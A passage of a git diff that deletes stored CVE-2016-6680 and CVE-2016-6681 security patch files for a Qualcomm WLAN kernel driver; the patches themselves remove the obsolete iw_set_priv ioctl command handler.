*pAdapter; -- char *cmd = NULL; -- int cmd_len = wrqu->data.length; -- int rc = 0, ret = 0; -- VOS_STATUS vos_status = VOS_STATUS_SUCCESS; -- -- hdd_context_t *pHddCtx; -- -- ENTER(); -- -- pAdapter = WLAN_HDD_GET_PRIV_PTR(dev); -- if (NULL == pAdapter) -- { -- VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_ERROR, -- "mem_alloc_copy_from_user_helper fail"); -- return -EINVAL; -- } -- pHddCtx = WLAN_HDD_GET_CTX(pAdapter); -- rc = wlan_hdd_validate_context(pHddCtx); -- if (0 != rc) -- { -- return rc; -- } -- -- cmd = mem_alloc_copy_from_user_helper(wrqu->data.pointer, -- wrqu->data.length); -- if (NULL == cmd) -- { -- VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_ERROR, -- "mem_alloc_copy_from_user_helper fail"); -- return -ENOMEM; -- } -- -- if (ioctl_debug) -- { -- pr_info("%s: req [%s] len [%d]\n", __func__, cmd, cmd_len); -- } -- -- hddLog(VOS_TRACE_LEVEL_INFO_MED, -- "%s: ***Received %s cmd from Wi-Fi GUI***", __func__, cmd); -- -- if (strncmp(cmd, "CSCAN", 5) == 0 ) -- { -- if (eHAL_STATUS_SUCCESS != iw_set_cscan(dev, info, wrqu, cmd)) { -- 
VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_ERROR, -- "%s: Error in iw_set_scan!", __func__); -- rc = -EINVAL; -- } -- } -- else if( strcasecmp(cmd, "start") == 0 ) { -- -- hddLog(VOS_TRACE_LEVEL_INFO_HIGH, "Start command"); -- /*Exit from Deep sleep or standby if we get the driver START cmd from android GUI*/ -- -- vos_status = wlan_hdd_exit_lowpower(pHddCtx, pAdapter); -- if (vos_status == VOS_STATUS_SUCCESS) -- { -- union iwreq_data wrqu; -- char buf[10]; -- -- memset(&wrqu, 0, sizeof(wrqu)); -- wrqu.data.length = strlcpy(buf, "START", sizeof(buf)); -- wireless_send_event(pAdapter->dev, IWEVCUSTOM, &wrqu, buf); -- } -- else -- { -- hddLog(VOS_TRACE_LEVEL_ERROR, "%s: START CMD Status %d", __func__, vos_status); -- rc = -EIO; -- } -- goto done; -- } -- else if( strcasecmp(cmd, "stop") == 0 ) -- { -- union iwreq_data wrqu; -- char buf[10]; -- -- hddLog(VOS_TRACE_LEVEL_INFO_HIGH, "Stop command"); -- -- wlan_hdd_enter_lowpower(pHddCtx); -- memset(&wrqu, 0, sizeof(wrqu)); -- wrqu.data.length = strlcpy(buf, "STOP", sizeof(buf)); -- wireless_send_event(pAdapter->dev, IWEVCUSTOM, &wrqu, buf); -- goto done; -- } -- else if (strcasecmp(cmd, "macaddr") == 0) -- { -- ret = snprintf(cmd, cmd_len, "Macaddr = " MAC_ADDRESS_STR, -- MAC_ADDR_ARRAY(pAdapter->macAddressCurrent.bytes)); -- } -- else if (strcasecmp(cmd, "scan-active") == 0) -- { -- hddLog(LOG1, -- FL("making default scan to active")); -- pHddCtx->scan_info.scan_mode = eSIR_ACTIVE_SCAN; -- ret = snprintf(cmd, cmd_len, "OK"); -- } -- else if (strcasecmp(cmd, "scan-passive") == 0) -- { -- hddLog(LOG1, -- FL("making default scan to passive")); -- pHddCtx->scan_info.scan_mode = eSIR_PASSIVE_SCAN; -- ret = snprintf(cmd, cmd_len, "OK"); -- } -- else if( strcasecmp(cmd, "scan-mode") == 0 ) -- { -- ret = snprintf(cmd, cmd_len, "ScanMode = %u", pHddCtx->scan_info.scan_mode); -- } -- else if( strcasecmp(cmd, "linkspeed") == 0 ) -- { -- ret = iw_get_linkspeed(dev, info, wrqu, cmd); -- } -- else if( strncasecmp(cmd, "COUNTRY", 
7) == 0 ) { -- char *country_code; -- long lrc; -- eHalStatus eHal_status; -- -- country_code = cmd + 8; -- -- init_completion(&pAdapter->change_country_code); -- -- eHal_status = sme_ChangeCountryCode(pHddCtx->hHal, -- (void *)(tSmeChangeCountryCallback)wlan_hdd_change_country_code_callback, -- country_code, -- pAdapter, -- pHddCtx->pvosContext, -- eSIR_TRUE, -- eSIR_TRUE); -- -- /* Wait for completion */ -- lrc = wait_for_completion_interruptible_timeout(&pAdapter->change_country_code, -- msecs_to_jiffies(WLAN_WAIT_TIME_STATS)); -- -- if (lrc <= 0) -- { -- hddLog(VOS_TRACE_LEVEL_ERROR,"%s: SME %s while setting country code ", -- __func__, "Timed out"); -- } -- -- if (eHAL_STATUS_SUCCESS != eHal_status) -- { -- VOS_TRACE( VOS_MODULE_ID_VOSS, VOS_TRACE_LEVEL_ERROR, -- "%s: SME Change Country code fail", __func__); -- kfree(cmd); -- return -EIO; -- } -- } -- else if( strncasecmp(cmd, "rssi", 4) == 0 ) -- { -- ret = iw_get_rssi(dev, info, wrqu, cmd); -- } -- else if( strncasecmp(cmd, "powermode", 9) == 0 ) { -- int mode; -- char *ptr; -- -- if (9 < cmd_len) -- { -- ptr = (char*)(cmd + 9); -- -- }else{ -- VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_ERROR, -- "CMD LENGTH %d is not correct",cmd_len); -- kfree(cmd); -- return -EINVAL; -- } -- -- if (1 != sscanf(ptr,"%d",&mode)) -- { -- VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_ERROR, -- "powermode input %s is not correct",ptr); -- kfree(cmd); -- return -EIO; -- } -- -- wlan_hdd_enter_bmps(pAdapter, mode); -- /*TODO:Set the power mode*/ -- } -- else if (strncasecmp(cmd, "getpower", 8) == 0 ) { -- v_U32_t pmc_state; -- v_U16_t value; -- -- pmc_state = pmcGetPmcState(WLAN_HDD_GET_HAL_CTX(pAdapter)); -- if(pmc_state == BMPS) { -- value = DRIVER_POWER_MODE_AUTO; -- } -- else { -- value = DRIVER_POWER_MODE_ACTIVE; -- } -- ret = snprintf(cmd, cmd_len, "powermode = %u", value); -- } -- else if( strncasecmp(cmd, "btcoexmode", 10) == 0 ) { -- hddLog( VOS_TRACE_LEVEL_INFO, "btcoexmode"); -- /*TODO: set the btcoexmode*/ -- } -- 
else if( strcasecmp(cmd, "btcoexstat") == 0 ) { -- -- hddLog(VOS_TRACE_LEVEL_INFO, "BtCoex Status"); -- /*TODO: Return the btcoex status*/ -- } -- else if( strcasecmp(cmd, "rxfilter-start") == 0 ) { -- -- hddLog(VOS_TRACE_LEVEL_INFO, "Rx Data Filter Start command"); -- -- /*TODO: Enable Rx data Filter*/ -- } -- else if( strcasecmp(cmd, "rxfilter-stop") == 0 ) { -- -- hddLog(VOS_TRACE_LEVEL_INFO, "Rx Data Filter Stop command"); -- -- /*TODO: Disable Rx data Filter*/ -- } -- else if( strcasecmp(cmd, "rxfilter-statistics") == 0 ) { -- -- hddLog( VOS_TRACE_LEVEL_INFO, "Rx Data Filter Statistics command"); -- /*TODO: rxfilter-statistics*/ -- } -- else if( strncasecmp(cmd, "rxfilter-add", 12) == 0 ) { -- -- hddLog( VOS_TRACE_LEVEL_INFO, "rxfilter-add"); -- /*TODO: rxfilter-add*/ -- } -- else if( strncasecmp(cmd, "rxfilter-remove",15) == 0 ) { -- -- hddLog( VOS_TRACE_LEVEL_INFO, "rxfilter-remove"); -- /*TODO: rxfilter-remove*/ -- } --#ifdef FEATURE_WLAN_SCAN_PNO -- else if( strncasecmp(cmd, "pnosetup", 8) == 0 ) { -- hddLog( VOS_TRACE_LEVEL_INFO, "pnosetup"); -- /*TODO: support pnosetup*/ -- } -- else if( strncasecmp(cmd, "pnoforce", 8) == 0 ) { -- hddLog( VOS_TRACE_LEVEL_INFO, "pnoforce"); -- /*TODO: support pnoforce*/ -- } -- else if( strncasecmp(cmd, "pno",3) == 0 ) { -- -- hddLog( VOS_TRACE_LEVEL_INFO, "pno"); -- vos_status = iw_set_pno(dev, info, wrqu, cmd, 3); -- kfree(cmd); -- return (vos_status == VOS_STATUS_SUCCESS) ? 0 : -EINVAL; -- } -- else if( strncasecmp(cmd, "rssifilter",10) == 0 ) { -- hddLog( VOS_TRACE_LEVEL_INFO, "rssifilter"); -- vos_status = iw_set_rssi_filter(dev, info, wrqu, cmd, 10); -- kfree(cmd); -- return (vos_status == VOS_STATUS_SUCCESS) ? 0 : -EINVAL; -- } --#endif /*FEATURE_WLAN_SCAN_PNO*/ -- else if( strncasecmp(cmd, "powerparams",11) == 0 ) { -- hddLog( VOS_TRACE_LEVEL_INFO, "powerparams"); -- vos_status = iw_set_power_params(dev, info, wrqu, cmd, 11); -- kfree(cmd); -- return (vos_status == VOS_STATUS_SUCCESS) ? 
0 : -EINVAL; -- } -- else if( 0 == strncasecmp(cmd, "CONFIG-TX-TRACKING", 18) ) { -- tSirTxPerTrackingParam tTxPerTrackingParam; -- char *ptr; -- -- if (18 < cmd_len) -- { -- ptr = (char*)(cmd + 18); -- }else{ -- VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_ERROR, -- "CMD LENGTH %d is not correct",cmd_len); -- kfree(cmd); -- return -EINVAL; -- } -- -- if (4 != sscanf(ptr,"%hhu %hhu %hhu %u", -- &(tTxPerTrackingParam.ucTxPerTrackingEnable), -- &(tTxPerTrackingParam.ucTxPerTrackingPeriod), -- &(tTxPerTrackingParam.ucTxPerTrackingRatio), -- &(tTxPerTrackingParam.uTxPerTrackingWatermark))) -- { -- VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_ERROR, -- "CONFIG-TX-TRACKING %s input is not correct",ptr); -- kfree(cmd); -- return -EIO; -- } -- -- // parameters checking -- // period has to be larger than 0 -- if (0 == tTxPerTrackingParam.ucTxPerTrackingPeriod) -- { -- VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_WARN, "Period input is not correct"); -- kfree(cmd); -- return -EIO; -- } -- -- // use default value 5 is the input is not reasonable. in unit of 10% -- if ((tTxPerTrackingParam.ucTxPerTrackingRatio > TX_PER_TRACKING_MAX_RATIO) || (0 == tTxPerTrackingParam.ucTxPerTrackingRatio)) -- { -- VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_WARN, "Ratio input is not good. use default 5"); -- tTxPerTrackingParam.ucTxPerTrackingRatio = TX_PER_TRACKING_DEFAULT_RATIO; -- } -- -- // default is 5 -- if (0 == tTxPerTrackingParam.uTxPerTrackingWatermark) -- { -- VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_WARN, "Tx Packet number input is not good. 
use default 5"); -- tTxPerTrackingParam.uTxPerTrackingWatermark = TX_PER_TRACKING_DEFAULT_WATERMARK; -- } -- -- if (eHAL_STATUS_SUCCESS != -- sme_SetTxPerTracking(pHddCtx->hHal, -- hdd_tx_per_hit_cb, -- (void*)pAdapter, &tTxPerTrackingParam)) { -- VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_WARN, "Set Tx PER Tracking Failed!"); -- rc = -EIO; -- } -- } -- else { -- hddLog( VOS_TRACE_LEVEL_WARN, "%s: Unsupported GUI command %s", -- __func__, cmd); -- } --done: -- /* many of the commands write information back into the command -- string using snprintf(). check the return value here in one -- place */ -- if ((ret < 0) || (ret >= cmd_len)) -- { -- /* there was an encoding error or overflow */ -- rc = -EINVAL; -- } -- else if (ret > 0) -- { -- if (copy_to_user(wrqu->data.pointer, cmd, ret)) -- { -- hddLog(VOS_TRACE_LEVEL_ERROR, -- "%s: failed to copy data to user buffer", __func__); -- kfree(cmd); -- return -EFAULT; -- } -- wrqu->data.length = ret; -- } -- -- if (ioctl_debug) -- { -- pr_info("%s: rsp [%s] len [%d] status %d\n", -- __func__, cmd, wrqu->data.length, rc); -- } -- kfree(cmd); -- EXIT(); -- return rc; --} -- --static int iw_set_priv(struct net_device *dev, -- struct iw_request_info *info, -- union iwreq_data *wrqu, char *extra) --{ -- int ret; -- vos_ssr_protect(__func__); -- ret = __iw_set_priv(dev, info, wrqu, extra); -- vos_ssr_unprotect(__func__); -- -- return ret; --} -- - static int __iw_set_nick(struct net_device *dev, - struct iw_request_info *info, - union iwreq_data *wrqu, char *extra) -@@ -10805,7 +10380,7 @@ static const iw_handler we_handler[] = - (iw_handler) NULL, /* SIOCGIWSENS */ - (iw_handler) NULL, /* SIOCSIWRANGE */ - (iw_handler) iw_get_range, /* SIOCGIWRANGE */ -- (iw_handler) iw_set_priv, /* SIOCSIWPRIV */ -+ (iw_handler) NULL, /* SIOCSIWPRIV */ - (iw_handler) NULL, /* SIOCGIWPRIV */ - (iw_handler) NULL, /* SIOCSIWSTATS */ - (iw_handler) NULL, /* SIOCGIWSTATS */ --- -cgit v1.1 - 
diff --git a/Patches/Linux_CVEs/CVE-2016-6680/qcacld-2.0/0002.patch b/Patches/Linux_CVEs/CVE-2016-6680/qcacld-2.0/0002.patch
deleted file mode 100644
index 7d039296..00000000
--- a/Patches/Linux_CVEs/CVE-2016-6680/qcacld-2.0/0002.patch
+++ /dev/null
@@ -1,480 +0,0 @@ -From 2f2fa073b95d4700de88c0f7558b4a18c13ac552 Mon Sep 17 00:00:00 2001 -From: SaidiReddy Yenuga -Date: Tue, 9 Aug 2016 16:10:39 +0530 -Subject: qcacld-2.0: Remove the support for iw_set_priv ioctl - -iw_set_priv is obsolete, now hdd_ioctl handles the -driver commands. - -Remove the code related to iw_set_priv ioctl - -CRs-Fixed: 1048052 -Change-Id: Ic64a45aab2d23669d6d1219f6d2d8a465d34ac10 ---- - CORE/HDD/src/wlan_hdd_wext.c | 436 +------------------------------------------ - 1 file changed, 1 insertion(+), 435 deletions(-) - -diff --git a/CORE/HDD/src/wlan_hdd_wext.c b/CORE/HDD/src/wlan_hdd_wext.c -index e8d0578..90431ea 100644 ---- a/CORE/HDD/src/wlan_hdd_wext.c -+++ b/CORE/HDD/src/wlan_hdd_wext.c -@@ -4023,69 +4023,6 @@ static int iw_get_linkspeed_priv(struct net_device *dev, - return ret; - } - --/* -- * Support for the RSSI & RSSI-APPROX private commands -- * Per the WiFi framework the response must be of the form -- * " rssi " -- * unless we are not associated, in which case the response is -- * "OK" -- */ --static int iw_get_rssi(struct net_device *dev, -- struct iw_request_info *info, -- union iwreq_data *wrqu, char *extra) --{ -- hdd_adapter_t *pAdapter = WLAN_HDD_GET_PRIV_PTR(dev); -- char *cmd = extra; -- int len = wrqu->data.length; -- v_S7_t s7Rssi = 0; -- hdd_station_ctx_t *pHddStaCtx = WLAN_HDD_GET_STATION_CTX_PTR(pAdapter); -- int ssidlen = pHddStaCtx->conn_info.SSID.SSID.length; -- VOS_STATUS vosStatus; -- int rc; -- -- if ((eConnectionState_Associated != pHddStaCtx->conn_info.connState) || -- (0 == ssidlen) || (ssidlen >= len)) -- { -- /* we are not connected or our SSID is too long -- so we cannot report an rssi */ -- rc = scnprintf(cmd, len, "OK"); -- } -- else -- { -- /* we are connected with a valid SSID -- so we can write the SSID into the return buffer -- (note that it is not NUL-terminated) */ -- memcpy(cmd, pHddStaCtx->conn_info.SSID.SSID.ssId, ssidlen ); -- -- vosStatus = wlan_hdd_get_rssi(pAdapter, &s7Rssi); -- -- if 
(VOS_STATUS_SUCCESS == vosStatus) -- { -- /* append the rssi to the ssid in the format required by -- the WiFI Framework */ -- rc = scnprintf(&cmd[ssidlen], len - ssidlen, " rssi %d", s7Rssi); -- rc += ssidlen; -- } -- else -- { -- rc = -1; -- } -- } -- -- /* verify that we wrote a valid response */ -- if ((rc < 0) || (rc >= len)) -- { -- // encoding or length error? -- hddLog(VOS_TRACE_LEVEL_ERROR, -- "%s: Unable to encode RSSI, got [%s]", -- __func__, cmd); -- return -EIO; -- } -- -- /* a value is being successfully returned */ -- return rc; --} -- - VOS_STATUS wlan_hdd_enter_bmps(hdd_adapter_t *pAdapter, int mode) - { - struct statsContext context; -@@ -4323,377 +4260,6 @@ void* wlan_hdd_change_country_code_callback(void *pAdapter) - } - - /** -- * __iw_set_priv() - SIOCSIWPRIV ioctl handler -- * @dev: device upon which the ioctl was received -- * @info: ioctl request information -- * @wrqu: ioctl request data -- * @extra: ioctl extra data -- * -- * Return: 0 on success, non-zero on error -- */ --static int __iw_set_priv(struct net_device *dev, struct iw_request_info *info, -- union iwreq_data *wrqu, char *extra) --{ -- hdd_adapter_t *pAdapter = WLAN_HDD_GET_PRIV_PTR(dev); -- char *cmd = NULL; -- int cmd_len = wrqu->data.length; -- int ret = 0; -- int rc = 0; -- VOS_STATUS vos_status = VOS_STATUS_SUCCESS; -- -- hdd_context_t *pHddCtx = WLAN_HDD_GET_CTX(pAdapter); -- -- ENTER(); -- cmd = mem_alloc_copy_from_user_helper(wrqu->data.pointer, -- wrqu->data.length); -- if (NULL == cmd) -- { -- VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_ERROR, -- "mem_alloc_copy_from_user_helper fail"); -- return -ENOMEM; -- } -- -- if (ioctl_debug) -- { -- pr_info("%s: req [%s] len [%d]\n", __func__, cmd, cmd_len); -- } -- -- hddLog(VOS_TRACE_LEVEL_INFO_MED, -- "%s: ***Received %s cmd from Wi-Fi GUI***", __func__, cmd); -- -- if (pHddCtx->isLogpInProgress) { -- if (ioctl_debug) -- { -- pr_info("%s: RESTART in progress\n", __func__); -- } -- -- VOS_TRACE(VOS_MODULE_ID_HDD, 
VOS_TRACE_LEVEL_FATAL, -- "%s:LOGP in Progress. Ignore!!!",__func__); -- vos_mem_free(cmd); -- return -EBUSY; -- } -- -- if (strncmp(cmd, "CSCAN", 5) == 0 ) -- { -- if (eHAL_STATUS_SUCCESS != iw_set_cscan(dev, info, wrqu, cmd)) { -- VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_ERROR, -- "%s: Error in iw_set_scan!", __func__); -- rc = -EINVAL; -- } -- } -- else if( strcasecmp(cmd, "start") == 0 ) { -- -- hddLog(VOS_TRACE_LEVEL_INFO_HIGH, "Start command"); -- /*Exit from Deep sleep or standby if we get the driver START cmd from android GUI*/ -- -- vos_status = wlan_hdd_exit_lowpower(pHddCtx, pAdapter); -- if (vos_status == VOS_STATUS_SUCCESS) -- { -- union iwreq_data wrqu; -- char buf[10]; -- -- memset(&wrqu, 0, sizeof(wrqu)); -- wrqu.data.length = strlcpy(buf, "START", sizeof(buf)); -- wireless_send_event(pAdapter->dev, IWEVCUSTOM, &wrqu, buf); -- } -- else -- { -- hddLog(VOS_TRACE_LEVEL_ERROR, "%s: START CMD Status %d", __func__, vos_status); -- rc = -EIO; -- } -- goto done; -- } -- else if( strcasecmp(cmd, "stop") == 0 ) -- { -- union iwreq_data wrqu; -- char buf[10]; -- -- hddLog(VOS_TRACE_LEVEL_INFO_HIGH, "Stop command"); -- -- wlan_hdd_enter_lowpower(pHddCtx); -- memset(&wrqu, 0, sizeof(wrqu)); -- wrqu.data.length = strlcpy(buf, "STOP", sizeof(buf)); -- wireless_send_event(pAdapter->dev, IWEVCUSTOM, &wrqu, buf); -- goto done; -- } -- else if (strcasecmp(cmd, "macaddr") == 0) -- { -- ret = snprintf(cmd, cmd_len, "Macaddr = " MAC_ADDRESS_STR, -- MAC_ADDR_ARRAY(pAdapter->macAddressCurrent.bytes)); -- } -- else if (strcasecmp(cmd, "scan-active") == 0) -- { -- hdd_context_t *pHddCtx = WLAN_HDD_GET_CTX(pAdapter); -- hddLog(LOG1, FL("making default scan to active")); -- pHddCtx->ioctl_scan_mode = eSIR_ACTIVE_SCAN; -- ret = snprintf(cmd, cmd_len, "OK"); -- } -- else if (strcasecmp(cmd, "scan-passive") == 0) -- { -- hdd_context_t *pHddCtx = WLAN_HDD_GET_CTX(pAdapter); -- hddLog(LOG1, FL("making default scan to active")); -- pHddCtx->ioctl_scan_mode = eSIR_PASSIVE_SCAN; 
-- ret = snprintf(cmd, cmd_len, "OK"); -- } -- else if( strcasecmp(cmd, "scan-mode") == 0 ) -- { -- ret = snprintf(cmd, cmd_len, "ScanMode = %u", pAdapter->scan_info.scan_mode); -- } -- else if( strcasecmp(cmd, "linkspeed") == 0 ) -- { -- ret = iw_get_linkspeed(dev, info, wrqu, cmd); -- } -- else if( strncasecmp(cmd, "COUNTRY", 7) == 0 ) { -- char *country_code; -- unsigned long rc; -- eHalStatus eHal_status; -- -- country_code = cmd + 8; -- -- init_completion(&pAdapter->change_country_code); -- -- eHal_status = sme_ChangeCountryCode(pHddCtx->hHal, -- (void *)(tSmeChangeCountryCallback)wlan_hdd_change_country_code_callback, -- country_code, -- pAdapter, -- pHddCtx->pvosContext, -- eSIR_TRUE, -- eSIR_TRUE); -- -- /* Wait for completion */ -- rc = wait_for_completion_timeout(&pAdapter->change_country_code, -- msecs_to_jiffies(WLAN_WAIT_TIME_STATS)); -- -- if (!rc) { -- hddLog(VOS_TRACE_LEVEL_ERROR, -- FL("SME timedout while setting country code")); -- } -- -- if (eHAL_STATUS_SUCCESS != eHal_status) -- { -- VOS_TRACE( VOS_MODULE_ID_VOSS, VOS_TRACE_LEVEL_ERROR, -- "%s: SME Change Country code fail", __func__); -- vos_mem_free(cmd); -- return -EIO; -- } -- } -- else if( strncasecmp(cmd, "rssi", 4) == 0 ) -- { -- ret = iw_get_rssi(dev, info, wrqu, cmd); -- } -- else if( strncasecmp(cmd, "powermode", 9) == 0 ) { -- int mode; -- char *ptr; -- -- if (9 < cmd_len) -- { -- ptr = (char*)(cmd + 9); -- -- }else{ -- VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_ERROR, -- "CMD LENGTH %d is not correct",cmd_len); -- vos_mem_free(cmd); -- return -EINVAL; -- } -- -- if (1 != sscanf(ptr,"%d",&mode)) -- { -- VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_ERROR, -- "powermode input %s is not correct",ptr); -- vos_mem_free(cmd); -- return -EIO; -- } -- -- if(!pHddCtx->cfg_ini->enablePowersaveOffload) -- wlan_hdd_enter_bmps(pAdapter, mode); -- else -- wlan_hdd_set_powersave(pAdapter, mode); -- } -- else if (strncasecmp(cmd, "getpower", 8) == 0 ) { -- v_U32_t pmc_state; -- v_U16_t value; -- 
-- pmc_state = pmcGetPmcState(WLAN_HDD_GET_HAL_CTX(pAdapter));
-- if(pmc_state == BMPS) {
-- value = DRIVER_POWER_MODE_AUTO;
-- }
-- else {
-- value = DRIVER_POWER_MODE_ACTIVE;
-- }
-- ret = snprintf(cmd, cmd_len, "powermode = %u", value);
-- }
-- else if( strncasecmp(cmd, "btcoexmode", 10) == 0 ) {
-- hddLog( VOS_TRACE_LEVEL_INFO, "btcoexmode");
-- /*TODO: set the btcoexmode*/
-- }
-- else if( strcasecmp(cmd, "btcoexstat") == 0 ) {
--
-- hddLog(VOS_TRACE_LEVEL_INFO, "BtCoex Status");
-- /*TODO: Return the btcoex status*/
-- }
-- else if( strcasecmp(cmd, "rxfilter-start") == 0 ) {
--
-- hddLog(VOS_TRACE_LEVEL_INFO, "Rx Data Filter Start command");
--
-- /*TODO: Enable Rx data Filter*/
-- }
-- else if( strcasecmp(cmd, "rxfilter-stop") == 0 ) {
--
-- hddLog(VOS_TRACE_LEVEL_INFO, "Rx Data Filter Stop command");
--
-- /*TODO: Disable Rx data Filter*/
-- }
-- else if( strcasecmp(cmd, "rxfilter-statistics") == 0 ) {
--
-- hddLog( VOS_TRACE_LEVEL_INFO, "Rx Data Filter Statistics command");
-- /*TODO: rxfilter-statistics*/
-- }
-- else if( strncasecmp(cmd, "rxfilter-add", 12) == 0 ) {
--
-- hddLog( VOS_TRACE_LEVEL_INFO, "rxfilter-add");
-- /*TODO: rxfilter-add*/
-- }
-- else if( strncasecmp(cmd, "rxfilter-remove",15) == 0 ) {
--
-- hddLog( VOS_TRACE_LEVEL_INFO, "rxfilter-remove");
-- /*TODO: rxfilter-remove*/
-- }
--#ifdef FEATURE_WLAN_SCAN_PNO
-- else if( strncasecmp(cmd, "pnosetup", 8) == 0 ) {
-- hddLog( VOS_TRACE_LEVEL_INFO, "pnosetup");
-- /*TODO: support pnosetup*/
-- }
-- else if( strncasecmp(cmd, "pnoforce", 8) == 0 ) {
-- hddLog( VOS_TRACE_LEVEL_INFO, "pnoforce");
-- /*TODO: support pnoforce*/
-- }
-- else if( strncasecmp(cmd, "pno",3) == 0 ) {
--
-- hddLog( VOS_TRACE_LEVEL_INFO, "pno");
-- ret = iw_set_pno(dev, info, wrqu, cmd, 3);
-- vos_mem_free(cmd);
-- return ret;
-- }
--#endif /*FEATURE_WLAN_SCAN_PNO*/
-- else if( strncasecmp(cmd, "powerparams",11) == 0 ) {
-- hddLog( VOS_TRACE_LEVEL_INFO, "powerparams");
-- vos_status = iw_set_power_params(dev, info, wrqu, cmd, 11);
-- vos_mem_free(cmd);
-- return (vos_status == VOS_STATUS_SUCCESS) ? 0 : -EINVAL;
-- }
-- else if( 0 == strncasecmp(cmd, "CONFIG-TX-TRACKING", 18) ) {
-- tSirTxPerTrackingParam tTxPerTrackingParam;
-- char *ptr;
--
-- if (18 < cmd_len)
-- {
-- ptr = (char*)(cmd + 18);
-- }else{
-- VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_ERROR,
-- "CMD LENGTH %d is not correct",cmd_len);
-- vos_mem_free(cmd);
-- return -EINVAL;
-- }
--
-- if (4 != sscanf(ptr,"%hhu %hhu %hhu %u",
-- &(tTxPerTrackingParam.ucTxPerTrackingEnable),
-- &(tTxPerTrackingParam.ucTxPerTrackingPeriod),
-- &(tTxPerTrackingParam.ucTxPerTrackingRatio),
-- &(tTxPerTrackingParam.uTxPerTrackingWatermark)))
-- {
-- VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_ERROR,
-- "CONFIG-TX-TRACKING %s input is not correct",ptr);
-- vos_mem_free(cmd);
-- return -EIO;
-- }
--
-- // parameters checking
-- // period has to be larger than 0
-- if (0 == tTxPerTrackingParam.ucTxPerTrackingPeriod)
-- {
-- VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_WARN, "Period input is not correct");
-- vos_mem_free(cmd);
-- return -EIO;
-- }
--
-- // use default value 5 is the input is not reasonable. in unit of 10%
-- if ((tTxPerTrackingParam.ucTxPerTrackingRatio > TX_PER_TRACKING_MAX_RATIO) || (0 == tTxPerTrackingParam.ucTxPerTrackingRatio))
-- {
-- VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_WARN, "Ratio input is not good. use default 5");
-- tTxPerTrackingParam.ucTxPerTrackingRatio = TX_PER_TRACKING_DEFAULT_RATIO;
-- }
--
-- // default is 5
-- if (0 == tTxPerTrackingParam.uTxPerTrackingWatermark)
-- {
-- VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_WARN, "Tx Packet number input is not good. use default 5");
-- tTxPerTrackingParam.uTxPerTrackingWatermark = TX_PER_TRACKING_DEFAULT_WATERMARK;
-- }
--
-- if (eHAL_STATUS_SUCCESS !=
-- sme_SetTxPerTracking(pHddCtx->hHal,
-- hdd_tx_per_hit_cb,
-- (void*)pAdapter, &tTxPerTrackingParam)) {
-- VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_WARN, "Set Tx PER Tracking Failed!");
-- rc = -EIO;
-- }
-- }
-- else {
-- hddLog( VOS_TRACE_LEVEL_WARN, "%s: Unsupported GUI command %s",
-- __func__, cmd);
-- }
--done:
-- /* many of the commands write information back into the command
-- string using snprintf(). check the return value here in one
-- place */
-- if ((ret < 0) || (ret >= cmd_len))
-- {
-- /* there was an encoding error or overflow */
-- rc = -EINVAL;
-- }
-- else if (ret > 0)
-- {
-- if (copy_to_user(wrqu->data.pointer, cmd, ret))
-- {
-- hddLog(VOS_TRACE_LEVEL_ERROR,
-- "%s: failed to copy data to user buffer", __func__);
-- vos_mem_free(cmd);
-- return -EFAULT;
-- }
-- wrqu->data.length = ret;
-- }
--
-- if (ioctl_debug)
-- {
-- pr_info("%s: rsp [%s] len [%d] status %d\n",
-- __func__, cmd, wrqu->data.length, rc);
-- }
-- vos_mem_free(cmd);
-- return rc;
--}
--
--/**
-- * iw_set_priv() - SSR wrapper for __iw_set_priv()
-- * @dev: pointer to net_device
-- * @info: pointer to iw_request_info
-- * @wrqu: pointer to iwreq_data
-- * @extra: pointer to extra ioctl payload
-- *
-- * Return: 0 on success, error number otherwise
-- */
--static int iw_set_priv(struct net_device *dev, struct iw_request_info *info,
-- union iwreq_data *wrqu, char *extra)
--{
-- int ret;
--
-- vos_ssr_protect(__func__);
-- ret = __iw_set_priv(dev, info, wrqu, extra);
-- vos_ssr_unprotect(__func__);
--
-- return ret;
--}
--
--/**
- * __iw_set_nick() - set nick
- * @dev: pointer to net_device
- * @info: pointer to iw_request_info
-@@ -11418,7 +10984,7 @@ static const iw_handler we_handler[] =
- (iw_handler) NULL, /* SIOCGIWSENS */
- (iw_handler) NULL, /* SIOCSIWRANGE */
- (iw_handler) iw_get_range, /* SIOCGIWRANGE */
-- (iw_handler) iw_set_priv, /* SIOCSIWPRIV */
-+ (iw_handler) NULL, /* SIOCSIWPRIV */
- (iw_handler) NULL, /* SIOCGIWPRIV */
- (iw_handler) NULL, /* SIOCSIWSTATS */
- (iw_handler) NULL, /* SIOCGIWSTATS */
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-6681/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-6681/ANY/0001.patch
deleted file mode 100644
index 5ee20560..00000000
--- a/Patches/Linux_CVEs/CVE-2016-6681/ANY/0001.patch
+++ /dev/null
@@ -1,48 +0,0 @@
-From 0950fbd39ff189497f1b6115825c210e3eeaf395 Mon Sep 17 00:00:00 2001
-From: Haynes Mathew George
-Date: Wed, 3 Aug 2016 11:55:07 -0700
